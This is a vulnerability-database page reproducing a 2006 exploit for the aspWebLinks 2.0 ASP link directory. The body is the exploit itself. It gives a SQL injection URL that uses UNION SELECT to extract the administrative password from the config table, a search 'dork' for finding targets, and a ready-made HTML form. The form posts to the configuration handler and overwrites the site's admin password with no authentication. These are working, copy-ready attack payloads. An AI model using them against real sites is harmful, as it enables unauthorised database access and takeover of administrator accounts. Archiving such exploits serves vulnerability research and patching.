Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

aspWebLinks2.0.txt

🗓️ 03 Jun 2006 00:00:00Reported by ajannType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injectio

Show more
Code
`<!--  
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection  
# Author : ajann  
# Dork : aspWebLinks 2.0  
  
SQL INJECTION:  
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config  
-->  
  
  
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>  
<form method='POST' action='links.asp?action=modifyconfigprocess'><input   
type='hidden' name='txtConfigID' value='1'><input type='hidden'   
name='txtSkinName' value='default'><table border='0' width='100%'   
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative   
Password:</b></font></td><td width='70%'><input type='text'   
name='txtAdministrativePassword' size='43'   
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days   
New:</b></font></td><td width='70%'><input type='text'   
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'   
align='right' valign='top'><font face="Tahoma" size="1"   
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input   
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td   
width='30%' align='right' valign='top'><font face="Tahoma" size="1"   
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input   
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td   
width='30%' align='right' valign='top'><font face="Tahoma" size="1"   
color="black"><b>Category Header:</b></font></td><td width='70%'><input   
type='text' name='txtCategoryHeader' size='43' value='<b>Select A   
Category:</b>'></td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Category   
Columns:</b></font></td><td width='70%'><input type='text'   
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'   
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub   
Category Header:</b></font></td><td width='70%'><input type='text'   
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick   
or ADD your link:'></td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category   
Description:</b></font></td><td width='70%'><input type='radio' value='YES'   
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'   
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on   
home page:</b></font></td><td width='70%'><input type='radio' value='YES'   
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'   
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New   
items on home page:</b></font></td><td width='70%'><input type='text'   
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'   
align='right' valign='top'><font face="Tahoma" size="1"   
color="black"><b>Show Whats Hot on home page:</b></font></td><td   
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked   
>YES<input type='radio' value='NO' name='txtShowWhatsHot'   
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font   
face="Tahoma" size="1" color="black"><b>Require approval for link and review   
additions:</b></font></td><td width='70%'><input type='radio' value='YES'   
name='txtNeedApproval' checked >YES<input type='radio' value='NO'   
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot   
items on home page:</b></font></td><td width='70%'><input type='text'   
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'   
align='right' valign='top'><font face="Tahoma" size="1"   
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input   
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats   
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font   
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td   
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'   
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links   
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option   
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date   
Added</option><option value='HITS'>Number of   
Visits</option></td></tr><tr><td width='30%' align='right'   
valign='top'><font face="Tahoma" size="1"   
color="black"><b></b></font></td><td width='70%'><input type='submit'   
value='Update Configuration' name='B1'></td></tr></table></form>  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
03 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4
aspsql injectionremote admin
18
.json
Report